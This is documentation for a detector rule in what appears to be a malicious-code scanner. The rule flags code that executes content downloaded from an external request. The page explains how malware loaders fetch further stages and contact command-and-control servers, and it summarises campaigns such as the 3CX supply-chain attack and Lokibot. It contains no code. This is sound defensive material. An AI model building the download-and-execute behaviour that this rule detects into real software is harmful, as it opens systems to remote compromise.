Downloaded Code Execution

ID

downloaded_code_execution

Severity

high

Resource

Execution

Tags

evader, trojan

Description

This detector looks for code that executes or evaluates code which comes as response of an external request.

Rationale

Usually, after infecting the system, the malicious code downloads additional malware binaries or source files, generally fetching it from a malicious site.

After downloading it, it’s executed to load the attackers’ full malware toolkit. When the toolkit is loaded, the malware binary is ready to communicate with the Command and Control (C&C) Host.

Related Malware campaigns

These are some popular campaigns using this technique:

  • 3CX Supply Chain Attack unfolded in March 2023 as a significant supply chain security breach. The assailants successfully infiltrated applications by incorporating a compromised library file, leading to the subsequent download of an encrypted file housing Command & Control information.

    The affected software ran a downloader, SUDDENICON, which in turn received additional command and control (C2) servers from encrypted icon files hosted on GitHub. The decrypted C2 server was used to download a third stage identified as ICONICSTEALER, a dataminer that steals browser information.

  • DEADEYE functions as a malware launcher utilized by APT41, and its usage dates back to at least May 2021.

  • Earth Lusca is an alleged cyber espionage group believed to be based in China, exhibiting activity since at least April 2019.

  • Lokibot is an extensively disseminated information-stealing tool first identified in 2015. Its primary function involves extracting sensitive data such as usernames, passwords, cryptocurrency wallets, and various credentials. Furthermore, Lokibot can establish a backdoor in compromised systems, enabling attackers to introduce additional payloads.

  • Remsec serves as a modular backdoor employed by Strider, showcasing indications of being primarily designed for espionage purposes.

  • StrifeWater operates as a remote-access tool utilized by Moses Staff in the initial stages of their attacks, with a documented presence since at least November 2021.

Configuration

The detector has the following configurable parameters:

  • sources, that indicates the source kinds to check. Available values are:

    • external_input

  • sinks, that indicates the sink to check. Available values are:

    • command_injection

    • code_injection

  • neutralizations, that indicates the neutralization kinds to check. By default, this is empty. No neutralizers are considered for potential malicious code.

References